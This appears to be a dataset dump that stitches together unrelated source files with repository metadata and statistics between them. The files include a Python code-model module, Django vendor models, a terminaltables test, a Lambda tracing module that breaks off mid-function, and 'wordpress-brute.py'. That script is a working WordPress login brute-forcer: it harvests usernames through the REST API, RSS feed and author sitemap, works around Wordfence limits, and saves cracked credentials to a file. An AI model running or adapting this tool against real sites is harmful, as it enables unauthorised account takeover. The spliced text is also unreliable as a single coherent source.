""" CodeStatement.__init__(self, scope, parent) self.name = name self.condition = True self.body = CodeBlock(scope, self, explicit=False) def get_branches(self): """Return a list of branches, where each branch is a pair of condition and respective body.""" return [(self.condition, self.body)] def _set_condition(self, condition): """Set the condition for this control flow structure.""" assert isinstance(condition, CodeExpression.TYPES) self.condition = condition def _set_body(self, body): """Set the main body for this control flow structure.""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.body = body else: self.body._add(body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return '{} {}'.format(self.name, self.get_branches()) class CodeConditional(CodeControlFlow): """This class represents a conditional (`if`). A conditional is allowed to have a default branch (the `else` branch), besides its mandatory one. """ def __init__(self, scope, parent): """Constructor for conditionals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, 'if') self.else_body = CodeBlock(scope, self, explicit=False) @property def then_branch(self): """The branch associated with a condition.""" return self.condition, self.body @property def else_branch(self): """The default branch of the conditional.""" return True, self.else_body def statement(self, i): """Return the *i*-th statement of this block. Behaves as if the *then* and *else* branches were concatenated, for indexing purposes. """ # ----- This code is just to avoid creating a new list and # returning a custom exception message. 
o = len(self.body) n = o + len(self.else_body) if i >= 0 and i < n: if i < o: return self.body.statement(i) return self.else_body.statement(i - o) elif i < 0 and i >= -n: if i >= o - n: return self.else_body.statement(i) return self.body.statement(i - o + n) raise IndexError('statement index out of range') def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" k = i + 1 o = len(self.body) n = o + len(self.else_body) if k > 0: if k < o: return self.body.statement(k) if k > o and k < n: return self.else_body.statement(k) if k < 0: if k < o - n and k > -n: return self.body.statement(k) if k > o - n: return self.else_body.statement(k) return None def get_branches(self): """Return a list with the conditional branch and the default branch.""" if self.else_branch: return [self.then_branch, self.else_branch] return [self.then_branch] def _add_default_branch(self, body): """Add a default body for this conditional (the `else` branch).""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.else_body = body else: self.else_body._add(body) def __len__(self): """Return the length of both branches combined.""" return len(self.body) + len(self.else_body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj for codeobj in self.else_body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}if ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) if self.else_body: pretty += '\n{}else:\n'.format(spaces) pretty += self.else_body.pretty_str(indent=indent + 2) return pretty class CodeLoop(CodeControlFlow): """This class represents a loop (e.g. 
`while`, `for`). Some languages allow loops to define local declarations, as well as an increment statement. A loop has only a single branch, its condition plus the body that should be repeated while the condition holds. """ def __init__(self, scope, parent, name): """Constructor for loops. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the loop statement in the program. """ CodeControlFlow.__init__(self, scope, parent, name) self.declarations = None self.increment = None def _set_declarations(self, declarations): """Set declarations local to this loop (e.g. `for` variables).""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_increment(self, statement): """Set the increment statement for this loop (e.g. in a `for`).""" assert isinstance(statement, CodeStatement) self.increment = statement statement.scope = self.body def _children(self): """Yield all direct children of this object.""" if self.declarations: yield self.declarations if isinstance(self.condition, CodeExpression): yield self.condition if self.increment: yield self.increment for codeobj in self.body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) v = self.declarations.pretty_str() if self.declarations else '' i = self.increment.pretty_str(indent=1) if self.increment else '' pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeSwitch(CodeControlFlow): """This class represents a switch statement. 
A switch evaluates a value (its `condition`) and then declares at least one branch (*cases*) that execute when the evaluated value is equal to the branch value. It may also have a default branch. Switches are often one of the most complex constructs of programming languages, so this implementation might be lackluster. """ def __init__(self, scope, parent): """Constructor for switches. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, "switch") self.cases = [] self.default_case = None def _add_branch(self, value, statement): """Add a branch/case (value and statement) to this switch.""" self.cases.append((value, statement)) def _add_default_branch(self, statement): """Add a default branch to this switch.""" self.default_case = statement def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}switch ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeTryBlock(CodeStatement, CodeStatementGroup): """This class represents a try-catch block statement. `try` blocks have a main body of statements, just like regular blocks. Multiple `catch` blocks may be defined to handle specific types of exceptions. Some languages also allow a `finally` block that is executed after the other blocks (either the `try` block, or a `catch` block, when an exception is raised and handled). """ def __init__(self, scope, parent): """Constructor for try block structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. 
""" CodeStatement.__init__(self, scope, parent) self.body = CodeBlock(scope, self, explicit=True) self.catches = [] self.finally_body = CodeBlock(scope, self, explicit=True) def _set_body(self, body): """Set the main body for try block structure.""" assert isinstance(body, CodeBlock) self.body = body def _add_catch(self, catch_block): """Add a catch block (exception variable declaration and block) to this try block structure. """ assert isinstance(catch_block, self.CodeCatchBlock) self.catches.append(catch_block) def _set_finally_body(self, body): """Set the finally body for try block structure.""" assert isinstance(body, CodeBlock) self.finally_body = body def _children(self): """Yield all direct children of this object.""" for codeobj in self.body._children(): yield codeobj for catch_block in self.catches: for codeobj in catch_block._children(): yield codeobj for codeobj in self.finally_body._children(): yield codeobj def __len__(self): """Return the length of all blocks combined.""" n = len(self.body) + len(self.catches) + len(self.finally_body) n += sum(map(len, self.catches)) return n def __repr__(self): """Return a string representation of this object.""" return 'try {} {} {}'.format(self.body, self.catches, self.finally_body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. 
""" spaces = ' ' * indent pretty = spaces + 'try:\n' pretty += self.body.pretty_str(indent=indent + 2) for block in self.catches: pretty += '\n' + block.pretty_str(indent) if len(self.finally_body) > 0: pretty += '\n{}finally:\n'.format(spaces) pretty += self.finally_body.pretty_str(indent=indent + 2) return pretty class CodeCatchBlock(CodeStatement, CodeStatementGroup): """Helper class for catch statements within a try-catch block.""" def __init__(self, scope, parent): """Constructor for catch block structures.""" CodeStatement.__init__(self, scope, parent) self.declarations = None self.body = CodeBlock(scope, self, explicit=True) def _set_declarations(self, declarations): """Set declarations local to this catch block.""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_body(self, body): """Set the main body of the catch block.""" assert isinstance(body, CodeBlock) self.body = body def _children(self): """Yield all direct children of this object.""" if isinstance(self.declarations, CodeStatement): yield self.declarations for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return 'catch ({}) {}'.format(self.declarations, self.body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent decls = ('...' if self.declarations is None else self.declarations.pretty_str()) body = self.body.pretty_str(indent=indent + 2) pretty = '{}catch ({}):\n{}'.format(spaces, decls, body) return pretty ############################################################################### # Helpers ############################################################################### def pretty_str(something, indent=0): """Return a human-readable string representation of an object. 
Uses `pretty_str` if the given value is an instance of `CodeEntity` and `repr` otherwise. Args: something: Some value to convert. Kwargs: indent (int): The amount of spaces to use as indentation. """ if isinstance(something, CodeEntity): return something.pretty_str(indent=indent) else: return (' ' * indent) + repr(something)
35.889841
81
0.60325
6,906
58,644
5.038952
0.082682
0.034771
0.02138
0.025662
0.571281
0.507141
0.465732
0.430616
0.409926
0.393575
0
0.001641
0.293602
58,644
1,633
82
35.911819
0.838387
0.427819
0
0.487805
0
0
0.024693
0
0
0
0
0
0.032999
1
0.220947
false
0.012912
0
0.002869
0.407461
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc4647689f1b8d8a1248e0d89dd5fa8d84dedfbf
350
py
Python
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
def is_even(i: int) -> bool: if i == 1: return False elif i == 2: return True elif i == 3: return False elif i == 4: return True elif i == 5: ... # Never do that! Use one of these instead... is_even = lambda i : i % 2 == 0 is_even = lambda i : not i & 1 is_odd = lambda i : not is_even(i)
20.588235
44
0.511429
59
350
2.949153
0.474576
0.137931
0.08046
0.183908
0
0
0
0
0
0
0
0.036364
0.371429
350
17
45
20.588235
0.754545
0.12
0
0.285714
0
0
0
0
0
0
0
0
0
1
0.071429
false
0
0
0
0.357143
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc46a91fda80741480960994acf3dbc98c9e618b
8,886
py
Python
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-07-27T11:30:23.000Z
2020-07-27T11:30:23.000Z
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
null
null
null
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-05-17T12:40:13.000Z
2020-05-17T12:40:13.000Z
#!/usr/bin/env python # # Wordpress Bruteforce Tool # # By @random_robbie # # import requests import json import sys import argparse import re import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL") parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File") args = parser.parse_args() url = args.url passfile = args.file http_proxy = "" proxyDict = { "http" : http_proxy, "https" : http_proxy, "ftp" : http_proxy } # Grab Wordpress Users via Wordpress JSON api def grab_users_api(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict) if 'rest_user_cannot_view' in response.text: print ("[-] REST API Endpoint Requires Permissions [-]") return False if response.status_code == 404: print ("[-] Rest API Endpoint returns 404 Not Found [-]") return False elif response.status_code == 200: jsonstr = json.loads(response.content) return jsonstr # Grab Wordpress Users via Sitemap def grab_users_sitemap(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: return response.text # Grab Wordpress Users via RSS Feed def grab_users_rssfeed(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = 
session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: if "dc:creator" in response.text: return response.text # Check we can get to wp-admin login. def check_wpadmin(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict) if "Powered by WordPress" in response.text: if "wp-submit" in response.text: if "reCAPTCHA" not in response.text: return True else: return False else: return False else: return False # Check URL is wordpress def check_is_wp(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict) if "wp-content" in response.text: return True else: return False # Check if wordfence is installed as this limits the logins to 20 per ip def check_wordfence(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict) if "Wordfence Security - Firewall & Malware Scan" in response.text: return True else: return False # Test the logins def test_login (url,user,password,cnt,attempts): if str(cnt) == attempts: print("[-] Stopping as Wordfence will block your IP [-]") sys.exit(0) paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"} headers = 
{"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} cookies = {"wordpress_test_cookie":"WP+Cookie+check"} response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False) if response.status_code == 503: print("[-] Website is giving 503 HTTP Status [-]") sys.exit(0) if response.status_code == 502: print("[-] Website is giving 502 HTTP Status [-]") sys.exit(0) if response.status_code == 403: print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]") sys.exit(0) if "Google Authenticator code" in response.text: print("[-] 2FA is enabled Sorry [-]") sys.exit(0) if "wordpress_logged_in" in response.headers['Set-Cookie']: print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]") text_file = open("found.txt", "a") text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n") text_file.close() sys.exit(0) else: print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]") cnt += 1 return cnt def count_pass(passfile): count = 0 with open(passfile, 'r') as f: for line in f: count += 1 f.close() return str(count) # Dont no body like dupes. 
def remove_dupes(): lines_seen = set() outfile = open("users.txt", "w") for line in open("rssusers.txt", "r"): if line not in lines_seen: outfile.write(line) lines_seen.add(line) outfile.close() def attack_restapi(url,attempts,userdata,passfile): for id in userdata: user = id['slug'] cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() def attack_rssfeed(url,attempts,userdata,passfile): users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata) if os.path.exists("rssusers.txt"): os.remove("rssusers.txt") if os.path.exists("users.txt"): os.remove("users.txt") for user in users: u = user.replace("[CDATA[","") text_file = open("rssusers.txt", "a") text_file.write(""+str(u)+"\n") text_file.close() remove_dupes() with open("users.txt", 'r') as f: for line in f: user = line.strip() cnt = 1 print(("[+] Found User: "+user+" [+]")) with open(passfile, 'r') as b: for line in b: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() b.close() def attack_sitemap(url,attempts,userdata,passfile): auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata) for user in auth: thisuser = user[1] h = thisuser.split('/') user = h[4] cnt = 1 with open(passfile, 'r') as f: for line in f: password = line.strip() cnt = test_login (url,user,password,cnt,attempts) f.close() # Time For Some Machine Learning Quality IF statements. 
def basic_checks(url): if check_is_wp(url): if check_wpadmin(url): return True else: return False else: return False if basic_checks(url): print("[+] Confirmed Wordpress Website [+]") else: print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]") sys.exit(0) if os.path.isfile(passfile) and os.access(passfile, os.R_OK): print("[+] Password List Used: "+passfile+" [+]") else: print("[-] Either the file is missing or not readable [-]") sys.exit(0) # Method Value for which method to enumerate users from method = "None" attempts = "None" # Which method to use for enumeration if grab_users_api(url): print("[+] Users found via Rest API [-]") method = "restapi" if grab_users_rssfeed(url) and method == "None": print("[+] Users found via RSS Feed [+]") method = "rss" if grab_users_sitemap(url) and method == "None": print("[+] Users found via Authors Sitemap [-]") method = "sitemap" if method == "None": print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]") sys.exit(0) if check_wordfence(url): print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]") attempts = "20" # Kick off Parsing and attacking if method == "restapi": userdata = grab_users_api(url) attack_restapi(url,attempts,userdata,passfile) if method == "rss": userdata = grab_users_rssfeed(url) attack_rssfeed(url,attempts,userdata,passfile) if method == "sitemap": userdata = grab_users_sitemap(url) attack_sitemap(url,attempts,userdata,passfile)
31.399293
388
0.679721
1,289
8,886
4.624515
0.223429
0.007046
0.027177
0.019963
0.41436
0.393055
0.33954
0.296427
0.241738
0.228988
0
0.028727
0.153838
8,886
282
389
31.510638
0.764064
0.059419
0
0.344498
0
0.043062
0.325699
0.039333
0
0
0
0
0
1
0.062201
false
0.124402
0.033493
0
0.191388
0.095694
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc49b99b0326493e147f5f9c2af303341e2290ed
2,422
py
Python
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
tests/tabular_output/test_terminaltables_adapter.py
zzl0/cli_helpers
266645937423225bdb636ef6aa659f1a40ceec5f
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """Test the terminaltables output adapter.""" from __future__ import unicode_literals from textwrap import dedent import pytest from cli_helpers.compat import HAS_PYGMENTS from cli_helpers.tabular_output import terminaltables_adapter if HAS_PYGMENTS: from pygments.style import Style from pygments.token import Token def test_terminal_tables_adapter(): """Test the terminaltables output adapter.""" data = [['abc', 1], ['d', 456]] headers = ['letters', 'number'] output = terminaltables_adapter.adapter( iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ +---------+--------+ | letters | number | +---------+--------+ | abc | 1 | | d | 456 | +---------+--------+''') @pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library') def test_style_output_table(): """Test that *style_output_table()* styles the output table.""" class CliStyle(Style): default_style = "" styles = { Token.Output.TableSeparator: '#ansired', } headers = ['h1', 'h2'] data = [['观音', '2'], ['Ποσειδῶν', 'b']] style_output_table = terminaltables_adapter.style_output_table('ascii') style_output_table(data, headers, style=CliStyle) output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii') assert "\n".join(output) == dedent('''\ \x1b[31;01m+\x1b[39;00m''' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' + ''' h2 \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + ('\x1b[31;01m-\x1b[39;00m' * 4)) + '''\x1b[31;01m+\x1b[39;00m \x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' + ''' 2 \x1b[31;01m|\x1b[39;00m \x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' + ''' b \x1b[31;01m|\x1b[39;00m ''' + '\x1b[31;01m+\x1b[39;00m' + ( ('\x1b[31;01m-\x1b[39;00m' * 10) + '\x1b[31;01m+\x1b[39;00m' + 
('\x1b[31;01m-\x1b[39;00m' * 4)) + '\x1b[31;01m+\x1b[39;00m')
34.6
86
0.547069
316
2,422
4.091772
0.218354
0.092807
0.148492
0.204176
0.492653
0.440062
0.402939
0.402939
0.402939
0.402939
0
0.143322
0.239472
2,422
69
87
35.101449
0.558632
0.066061
0
0.306122
0
0
0.305112
0.159212
0
0
0
0
0.040816
1
0.040816
false
0
0.142857
0
0.244898
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc50f97ead454f81e6290dc083d27cd62ab11353
2,878
py
Python
vendor/models.py
brethauer/mirage
396f61206bf76f997c0535277af918058aa1b827
[ "CC0-1.0" ]
8
2015-03-07T02:56:32.000Z
2016-08-30T17:09:30.000Z
vendor/models.py
brethauer/mirage
396f61206bf76f997c0535277af918058aa1b827
[ "CC0-1.0" ]
16
2015-02-25T16:09:39.000Z
2016-12-09T22:58:04.000Z
vendor/models.py
brethauer/mirage
396f61206bf76f997c0535277af918058aa1b827
[ "CC0-1.0" ]
13
2015-03-09T00:20:49.000Z
2021-02-14T11:02:32.000Z
from django.db import models

# Contract vehicles a Pool can belong to.
VEHICLE_CHOICES = (
    ('OASISSB', 'OASIS Small Business'),
    ('OASIS', 'OASIS Unrestricted')
)

# Workflow states (unused by the models below; kept for importers).
STATUS_CHOICES = (
    ('P', 'In Progress'),
    ('C', 'Completed'),
    ('F', 'Cancelled')
)


class Vendor(models.Model):
    """A vendor registered in SAM, identified by its DUNS number."""
    name = models.CharField(max_length=128)
    duns = models.CharField(max_length=9, unique=True)
    duns_4 = models.CharField(max_length=13, unique=True)
    cage = models.CharField(max_length=15, null=True)
    sam_address = models.CharField(null=True, max_length=128)
    sam_citystate = models.CharField(null=True, max_length=128)
    # Contract-manager (cm_*) and program-manager (pm_*) contact details.
    cm_name = models.CharField(null=True, max_length=128)
    cm_email = models.CharField(null=True, max_length=128)
    cm_phone = models.CharField(null=True, max_length=128)
    pm_name = models.CharField(null=True, max_length=128)
    pm_email = models.CharField(null=True, max_length=128)
    pm_phone = models.CharField(null=True, max_length=128)
    pools = models.ManyToManyField('Pool', through='PoolPIID')
    # FIX: removed null=True — it has no effect on ManyToManyField
    # (Django emits warning fields.W340); behavior is unchanged.
    setasides = models.ManyToManyField('SetAside', blank=True)
    sam_status = models.CharField(null=True, max_length=128)
    sam_activation_date = models.DateTimeField(null=True)
    sam_expiration_date = models.DateTimeField(null=True)
    # FIX: NullBooleanField always stores NULL-able booleans; the explicit
    # null=True was redundant and has been dropped (identical schema).
    sam_exclusion = models.NullBooleanField()
    sam_url = models.URLField(null=True)
    annual_revenue = models.BigIntegerField(null=True)
    number_of_employees = models.IntegerField(null=True)

    def __str__(self):
        return self.name


class Pool(models.Model):
    """A contract pool within a vehicle, covering a set of NAICS codes."""
    id = models.CharField(primary_key=True, max_length=128)
    name = models.CharField(max_length=128, default='Pool')
    number = models.CharField(max_length=128)
    vehicle = models.CharField(choices=VEHICLE_CHOICES, max_length=7)
    naics = models.ManyToManyField('Naics')
    threshold = models.CharField(null=True, max_length=128)

    def __str__(self):
        return "Pool {0} - {1}".format(self.number, self.get_vehicle_display())


class PoolPIID(models.Model):
    """Through model linking a Vendor to a Pool via its contract PIID."""
    vendor = models.ForeignKey('Vendor')
    pool = models.ForeignKey('Pool')
    piid = models.CharField(max_length=128)

    def __str__(self):
        return "{0} - {1} - {2}".format(self.vendor.name, self.pool.id, self.piid)


class SetAside(models.Model):
    """A small-business set-aside category (e.g. 8(a), HUBZone)."""
    code = models.CharField(unique=True, max_length=128)
    short_name = models.CharField(max_length=128)
    abbreviation = models.CharField(max_length=10, null=True)
    far_order = models.IntegerField(null=True)

    def __str__(self):
        return self.short_name


class Naics(models.Model):
    """A NAICS industry classification code."""
    code = models.CharField(max_length=128)
    description = models.TextField()
    short_code = models.CharField(unique=True, max_length=25)

    def __str__(self):
        return "{0} - {1}".format(self.code, self.description)


class SamLoad(models.Model):
    # Date of the most recent SAM data load.
    sam_load = models.DateField()
33.858824
82
0.709173
375
2,878
5.245333
0.261333
0.18302
0.109812
0.097611
0.449415
0.401118
0.3091
0.2303
0.046772
0
0
0.029801
0.160528
2,878
84
83
34.261905
0.784354
0
0
0.078125
0
0
0.055247
0
0
0
0
0
0
1
0.078125
false
0
0.015625
0.078125
0.859375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
fc557f84938097fbd8c0d95d4d05c57f1ad0bde0
4,093
py
Python
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
null
null
null
python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py
matt-tyler/opentelemetry-lambda
6b427d351fa721620fcd387e836e9f2f9f20cb60
[ "Apache-2.0" ]
1
2021-01-24T12:08:18.000Z
2021-01-24T12:08:18.000Z
# Copyright 2020, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# TODO: usage
"""
The opentelemetry-instrumentation-aws-lambda package allows tracing AWS
Lambda function.

Usage
-----

.. code:: python

    # Copy this snippet into AWS Lambda function
    # Ref Doc: https://docs.aws.amazon.com/lambda/latest/dg/lambda-python.html

    import boto3
    from opentelemetry.instrumentation.aws_lambda import (
        AwsLambdaInstrumentor
    )

    # Enable instrumentation
    AwsLambdaInstrumentor().instrument()

    # Lambda function
    def lambda_handler(event, context):
        s3 = boto3.resource('s3')
        for bucket in s3.buckets.all():
            print(bucket.name)

        return "200 OK"

API
---
"""

import logging
import os
from importlib import import_module

from wrapt import wrap_function_wrapper

# TODO: aws propagator
from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import (
    AwsXRayFormat,
)
from opentelemetry.instrumentation.aws_lambda.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider

logger = logging.getLogger(__name__)


class AwsLambdaInstrumentor(BaseInstrumentor):
    """Wraps the configured Lambda handler so each invocation runs inside
    an OpenTelemetry SERVER span carrying FaaS attributes."""

    def _instrument(self, **kwargs):
        # Tracer is bound to this instrumentation's name/version; callers may
        # supply an explicit tracer_provider via kwargs.
        self._tracer = get_tracer(__name__, __version__, kwargs.get("tracer_provider"))

        self._tracer_provider = get_tracer_provider()

        # ORIG_HANDLER is set by the OTel Lambda layer's wrapper script;
        # _HANDLER is the standard Lambda runtime variable. Both are
        # "module.function" strings, split here at the last dot.
        lambda_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))
        wrapped_names = lambda_handler.rsplit(".", 1)
        self._wrapped_module_name = wrapped_names[0]
        self._wrapped_function_name = wrapped_names[1]

        # Monkey-patch the user's handler with _functionPatch.
        wrap_function_wrapper(
            self._wrapped_module_name,
            self._wrapped_function_name,
            self._functionPatch,
        )

    def _uninstrument(self, **kwargs):
        # Restore the original (unwrapped) handler function.
        unwrap(
            import_module(self._wrapped_module_name),
            self._wrapped_function_name,
        )

    def _functionPatch(self, original_func, instance, args, kwargs):
        # Lambda invokes handler(event, context): args[1] is the runtime's
        # context object.
        lambda_context = args[1]
        ctx_aws_request_id = lambda_context.aws_request_id
        ctx_invoked_function_arn = lambda_context.invoked_function_arn
        orig_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))

        # TODO: enable propagate from AWS by env variable
        # _X_AMZN_TRACE_ID carries the upstream X-Ray trace header.
        xray_trace_id = os.environ.get("_X_AMZN_TRACE_ID", "")

        lambda_name = os.environ.get("AWS_LAMBDA_FUNCTION_NAME")
        function_version = os.environ.get("AWS_LAMBDA_FUNCTION_VERSION")

        # Extract the parent span context from the X-Ray header so this
        # invocation joins the upstream trace.
        propagator = AwsXRayFormat()
        parent_context = propagator.extract({"X-Amzn-Trace-Id": xray_trace_id})

        with self._tracer.start_as_current_span(
            name=orig_handler, context=parent_context, kind=SpanKind.SERVER
        ) as span:
            # Refer: https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/faas.md#example
            span.set_attribute("faas.execution", ctx_aws_request_id)
